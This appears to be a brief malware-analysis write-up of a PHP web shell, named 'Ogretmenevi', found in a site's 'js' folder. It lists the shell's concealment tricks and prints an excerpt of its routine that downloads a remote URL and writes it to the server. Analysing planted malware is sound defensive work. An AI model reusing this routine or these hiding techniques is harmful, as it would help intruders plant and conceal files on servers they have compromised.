SAMPLE 28092020-1 : Ogretmenevi

Found: 28/09/2020

Working name: Ogretmenevi




  • Seems to be a very simple file upload script
  • No obfuscation at all
  • It hides by these mechanisms:
    • In order to access the functionality you need to know a random string that is passed with every request as a GET parameter.
    • Sets error_reporting to level 0.
    • It is installed/copied under a folder called “js” in an attempt to go under the radar.
  • The person who installed this malware renamed the index.html file of the directory to index.php without changing the content at all, maybe as a way to see if the server supported PHP or not before uploading the file.
  • Ogretmenevi is a place in Turkey. By doing a Google search, more instances of this malware with the same folder name can be found, which indicates that this string is not random but fixed, and the likely Turkish origin of the malware.

Tested Functionality

  • File upload via included form
  • File download (?)
    • In order to download a file, tries to first do a cURL, which means that it gets what the user sees through the browser or empty in most cases. If this cURL fails, then it does a file_get_contents, which has a similar behavior, as it is passed a URL in both cases.
function get($site, $dir) {
    $getf = curl_init();
    curl_setopt($getf, CURLOPT_URL, $site);
    curl_setopt($getf, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($getf, CURLOPT_TIMEOUT, 10);
    $data = curl_exec($getf);
    if (!$data) {
        $data = @file_get_contents($site);
    file_put_contents($dir, $data);


  • Very amateur effort, especially the download part.
  • Use of very old HTML tags… like “font” (WTF?)